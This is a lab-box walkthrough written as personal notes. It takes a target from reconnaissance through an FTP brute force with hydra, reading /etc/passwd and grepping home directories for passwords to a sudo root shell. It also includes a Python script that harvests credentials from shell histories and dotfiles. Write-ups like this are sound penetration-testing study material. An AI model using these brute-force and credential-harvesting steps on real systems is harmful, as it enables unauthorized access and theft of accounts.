A box I really liked. It exposed my weaknesses well, and I fell into basically every rabbit hole it has, so this write-up doubles as notes.
Takeaway: attacking boxes is often counter-intuitive. You cannot go on gut feeling, or skip something because it seems unlikely; it is a rigorous, purely rational process.
Write-up
nmap
plain
┌──(kali㉿kali)-[~/PG/replayplay/stapter]
└─$ nmap -sT -p- 192.168.113.240 -oA nmapscan/ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 09:52 EDT
Nmap scan report for 192.168.113.240
Host is up (0.0038s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
12380/tcp open unknown
MAC Address: 08:00:27:D9:17:D1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 119.02 seconds
Cut the open ports out with awk
plain
┌──(kali㉿kali)-[~/PG/replayplay/stapter]
└─$ port=$(cat nmapscan/ports.nmap | grep open | awk -F '/' '{print $1}'|paste -sd ',')
Detailed TCP scan (version detection, default scripts, OS guess)
plain
┌──(kali㉿kali)-[~/PG/replayplay/stapter]
└─$ nmap -sT -sC -sV -O -p21,22,53,80,139,666,3306,12380 192.168.113.240 -oA nmapscan/details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 09:59 EDT
Nmap scan report for 192.168.113.240
Host is up (0.0024s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.113.200
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open tcpwrapped
3306/tcp open mysql MySQL (blocked - too many connection errors)
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Tim, we need to-do better next year for Initech
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:D9:17:D1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.13 - 4.4 (97%), Linux 3.16 - 4.6 (97%), Linux 3.8 - 3.16 (97%), Linux 4.4 (97%), Linux 3.2 - 4.14 (97%), Linux 3.13 (95%), Linux 3.18 (94%), Linux 4.2 (94%), Linux 3.13 - 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-10-15T13:44:19
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2025-10-15T14:44:20+01:00
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -36m03s, deviation: 34m34s, median: -16m06s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.55 seconds
FTP allows anonymous login.
Port 53 runs dnsmasq 2.75; searchsploit has entries for it, but they are denial-of-service only, which does not help here.
The page title on 12380 mentions the name Tim; add it to the username list.
(The -sC option in the scan above already covers the nmap script scan.)
Information gathering
Anonymous FTP access
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ ftp 192.168.113.240
Connected to 192.168.113.240.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.113.240:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Login succeeded. The banner names Harry; add him to the username list.
plain
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
100% |**********************************************************| 107 15.70 KiB/s 00:00 ETA
226 Transfer complete.
107 bytes received in 00:00 (9.05 KiB/s)
After confirming there are no other files, exit.
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Add Elly and John to the username list. The note asks Elly to leave information in her FTP account, so presumably FTP also accepts a login as elly.
But even late in the information gathering (with the full username list and the other hints), I could not brute-force the FTP login.
Continue gathering information.
List the shares on the SMB server:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ smbclient -L //192.168.113.240
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP RED
-L lists the shares the target offers (shared folders, printers, and so on). The password prompt was answered with an empty password, so this is a null session; it works because the server accepts guest access (nmap's smb-security-mode showed account_used: guest).
kathy and tmp are the file shares we can reach here.
Connect to a share:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ smbclient //192.168.113.240/kathy
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 3 12:52:52 2016
.. D 0 Mon Jun 6 17:39:56 2016
kathy_stuff D 0 Sun Jun 5 11:02:27 2016
backup D 0 Sun Jun 5 11:04:14 2016
19478204 blocks of size 1024. 16309640 blocks available
smb: \>
Not much in here; dump all of it:
plain
smb: \> cd kathy_stuff\
smb: \kathy_stuff\> ls
. D 0 Sun Jun 5 11:02:27 2016
.. D 0 Fri Jun 3 12:52:52 2016
todo-list.txt N 64 Sun Jun 5 11:02:27 2016
19478204 blocks of size 1024. 16309636 blocks available
smb: \kathy_stuff\> get todo-list.txt
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (3.9 KiloBytes/sec) (average 3.9 KiloBytes/sec)
smb: \kathy_stuff\> cd ../
smb: \> ls
. D 0 Fri Jun 3 12:52:52 2016
.. D 0 Mon Jun 6 17:39:56 2016
kathy_stuff D 0 Sun Jun 5 11:02:27 2016
backup D 0 Sun Jun 5 11:04:14 2016
19478204 blocks of size 1024. 16309632 blocks available
smb: \> cd backup
smb: \backup\> ls
. D 0 Sun Jun 5 11:04:14 2016
.. D 0 Fri Jun 3 12:52:52 2016
vsftpd.conf N 5961 Sun Jun 5 11:03:45 2016
wordpress-4.tar.gz N 6321767 Mon Apr 27 13:14:46 2015
19478204 blocks of size 1024. 16309632 blocks available
smb: \backup\> mget *
Get file vsftpd.conf? y
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (215.6 KiloBytes/sec) (average 136.8 KiloBytes/sec)
Get file wordpress-4.tar.gz? y
getting file \backup\wordpress-4.tar.gz of size 6321767 as wordpress-4.tar.gz (796.4 KiloBytes/sec) (average 792.7 KiloBytes/sec)
smb: \backup\>
Going through them (the to-do list, vsftpd.conf, the WordPress tarball), nothing of much value; add kathy to the username list.
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ cat todo-list.txt
I'm making sure to backup anything important for Initech, Kathy
Port 3306: no unauthenticated access.
Neither web port turned up anything useful from scanning.
Comments in the page source on 12380:
plain
<!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->
<!-- You can change the black color for the filter with those colors: blue, green, red, orange -->
<!-- H1 can have 2 designs: "logo" and "logo cursive" -->
Add the username zoe. Changed the front end as the comments describe; nothing there.
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ curl -I http://192.168.113.240:12380
HTTP/1.1 400 Bad Request
Date: Wed, 15 Oct 2025 14:38:41 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Fri, 03 Jun 2016 16:55:33 GMT
ETag: "6a16a-53462974b46e8"
Accept-Ranges: bytes
Content-Length: 434538
Dave: Soemthing doesn't look right here
Connection: close
Content-Type: text/htm
A custom response header naming Dave; add him to the list.
Port 666: nmap could not identify the service, but it is open.
Try reaching it with nc/telnet:
plain
telnet 192.168.113.240 666
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ telnet 192.168.113.240 666
Trying 192.168.113.240...
Connected to 192.168.113.240.
Escape character is '^]'.
Pd��Hp���,2
message2.jpgUT +�QWJ�QWux
��z
T��P���A@� �UT�T�2>��RDK�Jj�"DL[E�
0<Ĵ�ʮn���V�W�H ����
_�dr���9��u�Y�ܳoX�Y�2�e���2��y}�a����>`� �:�y�����^�sC��
��ncܤI��+j�[����=,Κ����s����is�M?����eY��������]sS�bQ���AoA��9ӂ���x�Oݙ4����1�N���3w�&&q��'i�fL��\���̀ޚ��:�ũ�r����{���:i���T�/�-W&�N�<�\.���Ф���^���g�.ּ�|W�����j�f~��x'�O��̚��`aТ�KV��
ou����7�|��ÄO�nKܾ#)���{���g8�u([r�H~A�qYQq�w��?}��?��Ty��ժk��SW������f�F�k��y������Y_?n2�߆^
����m��f".��?B��,��[�&�NbM���V�� 3&M~{����-�]_��[qt��o/ֶ�����������_@N�����{��E������i�.L�\gD��p���Ym
I�ˇ9-a)T���SWb�N�&���vO�3A#�,��^������4�C͈�}��~�R�`wT��KTamۙf�
��L}AJ�H�2�(Okɩ␦����dN���.npy.9��Rr9�Ү�#�Og���~�]V�BGu�=��HU���I��GTQ���
L�ڒ��*P?����Dfv�`��k�S�P0���
���q�2��t�w����;����G����?P]�V���4<Q{>�h(}]LE�Hi��2~�@ǝ�xn籡��U���'4�z��%jow^Mo�~:� ��yνn����=fa���r�ٰ��U�t�y��B~q^7�,���:��ҩ;��ȝ��{���O 1M�ˁ�Ĉ��T��Y��Ԗ��O␦ְ7�:�/�7;��"3\��lt6"9:�?�,����My�Ք1��2�x5
��z��z�(ho���cGBn]�3�О�7��JA�"ֹ
Connected to...: the TCP three-way handshake completed and the connection is up.
The terminal renders whatever it receives as text (UTF-8 here). When the remote side sends binary rather than text (an image, an archive, an encrypted stream, audio, or some binary protocol), the non-printable bytes come out as garbage or question marks.
The fragments at the start and the end both contain message2.jpg,
so the suspicion is that the service is streaming a JPEG, or a container holding one.
Save the raw bytes to a file and let tools identify them.
(Use nc rather than telnet for this. telnet is not a raw TCP client: it negotiates telnet options, treats 0xFF as an escape byte and rewrites line endings, so a binary stream captured through it is not byte-accurate. nc writes the stream untouched.)
plain
nc 192.168.113.240 666 >output.bin
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ nc 192.168.113.240 666 >output.bin
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ file output.bin
output.bin: Zip archive data, made by v3.0 UNIX, extract using at least v2.0, last modified Jun 03 2016 16:03:08, uncompressed size 12821, method=deflate
It is a zip archive.
Use xxd to see the hex next to the printable text:
plain
xxd -l 128 output.bin # first 128 bytes, hex and printable text side by side
plain
00000000: 504b 0304 1400 0200 0800 6480 c348 70df PK........d..Hp.
00000010: 1581 aa2c 0000 1532 0000 0c00 1c00 6d65 ...,...2......me
00000020: 7373 6167 6532 2e6a 7067 5554 0900 032b ssage2.jpgUT...+
00000030: 9c51 574a 9c51 5775 780b 0001 04f5 0100 .QWJ.QWux.......
00000040: 0004 1400 0000 ad7a 0b54 13e7 beef 5094 .......z.T....P.
00000050: 8888 4140 a220 19ab 5554 c454 11a9 1032 ..A@. ..UT.T...2
00000060: 3e8a d452 444b 1585 4a6a a922 444c 5b45 >..RDK..Jj."DL[E
00000070: a20c 1914 303c c4b4 b5ca ae6e 898a 8a56 ....0<.....n...V
504b 0304 is the ZIP local file header signature (PK\x03\x04), so this is an archive containing message2.jpg.
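The pattern above (save the stream raw, then classify it by magic bytes rather than by what the terminal shows) generalises. The following Python is an added example for this write-up, not code from the box or from any existing tool: fetch_blob() reads a TCP service to EOF exactly as nc does, identify() names the format from its leading bytes, and classify_blob() also types each member when the blob is a zip, since a file called .jpg need not be one. The sample blob is constructed in memory so the script runs offline; the HOST PORT arguments are only used when you pass them.

```python
"""Classify a blob pulled from an unknown TCP service (added example; not code
from the box or the write-up). fetch_blob() reads raw TCP to EOF like nc does,
identify() names the format from magic bytes instead of trusting the terminal,
and classify_blob() also lists and types members when the blob is a zip.
build_sample_blob() constructs an in-memory stand-in for what port 666 served."""
import io
import socket
import sys
import zipfile

# Leading-byte signatures for formats that tend to fall out of odd ports.
MAGIC = [
    (b"PK\x03\x04", "zip (local file header)"),
    (b"PK\x05\x06", "zip (empty archive)"),
    (b"\x1f\x8b", "gzip"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\x7fELF", "elf"),
    (b"%PDF", "pdf"),
]


def fetch_blob(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Read until the service closes the connection. Plain TCP: no telnet
    option negotiation (0xFF IAC) or CRLF rewriting, so bytes arrive intact."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def identify(blob: bytes) -> str:
    """Name the format from its first bytes; fall back to a printable-ratio
    heuristic so plain text banners are not reported as binary."""
    for sig, name in MAGIC:
        if blob.startswith(sig):
            return name
    if blob:
        printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in blob)
        if printable / len(blob) > 0.95:
            return "text"
    return "unknown binary"


def classify_blob(blob: bytes) -> dict:
    """Top-level type plus, for zips, each member's name, size and own type
    (a member called .jpg need not actually be a JPEG)."""
    result = {"kind": identify(blob), "size": len(blob), "members": {}}
    if result["kind"].startswith("zip"):
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for info in zf.infolist():
                result["members"][info.filename] = {
                    "size": info.file_size,
                    "kind": identify(zf.read(info.filename)),
                }
    return result


def build_sample_blob() -> bytes:
    """Constructed stand-in for the port-666 stream: a deflated zip holding one
    minimal JPEG-shaped file (SOI/APP0 marker, filler, EOI marker)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("message2.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 60 + b"\xff\xd9")
    return buf.getvalue()


if __name__ == "__main__":
    if len(sys.argv) == 3:          # python3 classify.py HOST PORT
        blob = fetch_blob(sys.argv[1], int(sys.argv[2]))
        with open("output.bin", "wb") as f:
            f.write(blob)            # keep the raw bytes for file/xxd/unzip
    else:
        blob = build_sample_blob()
    print(classify_blob(blob))
```

Run it with no arguments to see the constructed sample classified; with a host and port it saves the raw stream to output.bin first, so file, xxd and unzip can still be used on the same bytes.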
List the archive contents:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ unzip -l output.bin
Archive: output.bin
Length Date Time Name
--------- ---------- ----- ----
12821 2016-06-03 11:03 message2.jpg
--------- -------
12821 1 file
Extract it:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ unzip output.bin
Archive: output.bin
inflating: message2.jpg
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ ls
message2.jpg note output.bin stapter todo-list.txt vsftpd.conf wordpress-4.tar.gz
View the image (message2.jpg, not reproduced here):
Still nothing useful beyond another name, Scott; add scott to the list.
Check the metadata with exiftool:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ exiftool message2.jpg
ExifTool Version Number : 13.25
File Name : message2.jpg
Directory : .
File Size : 13 kB
File Modification Date/Time : 2016:06:03 11:03:07-04:00
File Access Date/Time : 2025:10:15 10:52:47-04:00
File Inode Change Date/Time : 2025:10:15 10:50:49-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 72
Y Resolution : 72
Current IPTC Digest : 020ab2da2a37c332c141ebf819e37e6d
Contact : If you are reading this, you should get a cookie!
Application Record Version : 4
IPTC Digest : d41d8cd98f00b204e9800998ecf8427e
Warning : IPTCDigest is not current. XMP may be out of sync
Image Width : 364
Image Height : 77
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 364x77
Megapixels : 0.028
Contact says "get a cookie". Spent a while on that; no lead.
Then binwalk for embedded binaries: nothing.
steghide for steganography:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ steghide info message2.jpg
"message2.jpg":
format: jpeg
capacity: 318.0 Byte
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide info always asks for a passphrase before it checks anything, so the prompt by itself does not prove that data is embedded. Still worth trying: ran stegseek with the collected wordlist (usernames plus the other strings worth noting) and then with rockyou.txt; both failed.
Stuck here for a long time. After some searching:
hydra has an option for FTP brute-forcing: -e nsr
It targets common weak-password habits.
It adds three extra tries per user: n = null (empty) password, s = same as the login, r = the login reversed.
With that option, rerun the earlier FTP brute force:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ hydra -L u.txt -e nsr ftp://192.168.113.240
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-15 11:22:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 105 login tries (l:35/p:3), ~7 tries per task
[DATA] attacking ftp://192.168.113.240:21/
[21][ftp] host: 192.168.113.240 login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-15 11:23:05
I honestly did not know this password habit was common abroad; this option needs to go into the standard attack chain.
Tried the same credentials on SSH: elly cannot log in.
Inside elly's FTP account, going through the files one by one, passwd turns out to be readable; download it.
Append its login-capable users to my wordlist:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ cat passwd | grep -E '/bin/bash|/bin/sh|/bin/zsh' | awk -F ':' '{print $1}' >>u.txt
For rigor: with new usernames, another pass might turn up credentials for other FTP users.
Test nsr again first:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ hydra -L u.txt -e nsr ftp://192.168.113.240
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-15 11:41:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 183 login tries (l:61/p:3), ~12 tries per task
[DATA] attacking ftp://192.168.113.240:21/
[21][ftp] host: 192.168.113.240 login: elly password: ylle
[21][ftp] host: 192.168.113.240 login: SHayslett password: SHayslett
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-15 11:42:06
There really was one more.
Again for rigor, try the credentials on SSH once more:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ ssh SHayslett@192.168.113.240
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.113.240's password:
Welcome back!
SHayslett@red:~$
It logged in. Rigor pays off on these boxes.
Privilege escalation
Start enumerating
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ ssh SHayslett@192.168.113.240
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.113.240's password:
Welcome back!
SHayslett@red:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for SHayslett:
Sorry, try again.
[sudo] password for SHayslett:
Sorry, try again.
[sudo] password for SHayslett:
Sorry, user SHayslett may not run sudo on red.
SHayslett@red:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/ubuntu-core-launcher
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/authbind/helper
/bin/mount
/bin/umount
/bin/ping
/bin/fusermount
/bin/ping6
/bin/su
No obviously exploitable SUID binary for now. At this point I remembered passwd: that many users is genuinely unusual.
From earlier experience (probably mentioned in my earlier write-ups):
on a box with a lot of users, recursively searching /home for passwords is always a good idea.
So:
plain
SHayslett@red:~$ grep -R -i 'pass' /home 2>/dev/null
/home/peter/.zcompdump:'chpass' '_chsh'
/home/peter/.zcompdump:'passwd' '_users'
/home/peter/.zcompdump:'systemd-ask-password' '_systemd'
/home/peter/.zcompdump:'systemd-tty-ask-password-agent' '_systemd'
/home/peter/.zcompdump:'yppasswd' '_yp'
/home/JKanode/.bash_history:sshpass -p thisimypassword ssh JKanode@localhost
/home/JKanode/.bash_history:apt-get install sshpass
/home/JKanode/.bash_history:sshpass -p JZQuyIN5 peter@localhost
Another user's password, found.
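The grep above works because sshpass takes the password on the command line and bash writes the whole line to .bash_history. An added example (mine, not part of the write-up): a small hunter that walks a tree of home directories, reads the dotfiles it is allowed to open, and pulls login and password out of sshpass and mysql invocations and KEY=VALUE lines, so every hit carries file:line provenance. The home tree it builds for demo() is constructed; the two sshpass lines mirror what the box's history held, while the mysql line and the .zshrc entry are invented for the example.

```python
"""Credential hunt over home directories (added example, not the write-up's
commands). hunt() walks a tree, reads dotfiles it is allowed to open, and
extract_creds() pulls login/password out of sshpass and mysql invocations
and KEY=VALUE lines. demo() builds a constructed home tree to run against."""
import os
import re
import tempfile
from pathlib import Path

# Each entry -> (tool name, compiled regex). Group layout differs per tool,
# so extract_creds() knows which group is the user and which the password.
PATTERNS = [
    # sshpass -p PW ssh [-o ...] user@host      sshpass -p PW user@host
    ("sshpass", re.compile(r"sshpass\s+-p\s*(\S+)\s+(?:ssh\s+(?:-\S+\s+)*)?(?:(\w+)@)?\S+")),
    # mysql -u user -pPASSWORD  (password glued to -p; a bare -p just prompts)
    ("mysql", re.compile(r"\bmysql\b.*?-u\s*(\w+).*?\s-p(\S+)")),
    # DB_PASSWORD=..., password: ... in dotfiles and configs
    ("kv", re.compile(r"(?i)\b(\w*pass(?:word|wd)?\w*)\s*[=:]\s*['\"]?([^'\"\s]+)")),
]


def extract_creds(line: str, source: str) -> list[dict]:
    """Credential dicts found in one line; the first matching tool wins."""
    for tool, rx in PATTERNS:
        m = rx.search(line)
        if not m:
            continue
        if tool == "sshpass":
            password, user = m.group(1), m.group(2) or ""
        elif tool == "mysql":
            user, password = m.group(1), m.group(2)
        else:
            user, password = "", m.group(2)
        return [{"tool": tool, "user": user, "password": password, "source": source}]
    return []


def hunt(root: str, max_bytes: int = 1_000_000) -> list[dict]:
    """Walk root and scan dotfiles (histories, rc files) below max_bytes.
    Other users' homes are often mode 700: unreadable files are skipped, not fatal."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.startswith("."):
                continue
            p = Path(dirpath) / fn
            try:
                if not p.is_file() or p.stat().st_size > max_bytes:
                    continue
                text = p.read_text(errors="replace")
            except OSError:
                continue
            for n, line in enumerate(text.splitlines(), 1):
                hits.extend(extract_creds(line, f"{p}:{n}"))
    return hits


def build_sample(tmpdir: str) -> str:
    """Constructed fixture. The two sshpass lines mirror what the box's
    .bash_history held; the mysql line and the .zshrc entry are invented."""
    home = Path(tmpdir) / "home"
    (home / "JKanode").mkdir(parents=True)
    (home / "JKanode" / ".bash_history").write_text(
        "ls\n"
        "sshpass -p thisimypassword ssh JKanode@localhost\n"
        "apt-get install sshpass\n"
        "sshpass -p JZQuyIN5 peter@localhost\n"
        "mysql -u root -pS3cret wordpress\n"
    )
    (home / "peter").mkdir()
    (home / "peter" / ".zshrc").write_text("export PATH=$PATH:~/bin\nDB_PASSWORD='hunter2'\n")
    return str(home)


def demo() -> list[dict]:
    """Run hunt() over the constructed tree; on a real box call hunt('/home')."""
    with tempfile.TemporaryDirectory() as d:
        return hunt(build_sample(d))


if __name__ == "__main__":
    for h in demo():
        print(f"{h['tool']:8} {h['user'] or '-':10} {h['password']:18} {h['source']}")
```

On a target, hunt("/home") is the equivalent of the grep, but the output is already split into user and password, and the source column tells you which history file to read in full, since the lines around a hit (the host, the service) are usually worth as much as the password.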
plain
SHayslett@red:~$ su - peter
Password:
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~). This function can help you with a few settings that should
make your use of the shell easier.
You can:
(q) Quit and do nothing. The function will be run again next time.
(0) Exit, creating the file ~/.zshrc containing just a comment.
That will prevent this function being run again.
(1) Continue to the main menu.
(2) Populate your ~/.zshrc with the configuration recommended
by the system administrator and exit (you will need to edit
the file by hand, if so desired).
--- Type one of the keys in parentheses ---
Aborting.
The function will be run again next time. To prevent this, execute:
touch ~/.zshrc
red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% whoami
peter
red% sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter:
Matching Defaults entries for peter on red:
lecture=always, env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User peter may run the following commands on red:
(ALL : ALL) ALL
red% sudo -i
➜ ~ id
uid=0(root) gid=0(root) groups=0(root)
➜ ~ whoami
root
➜ ~ cd /root
➜ ~ ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
➜ ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
➜ ~
Privilege escalation complete; root obtained.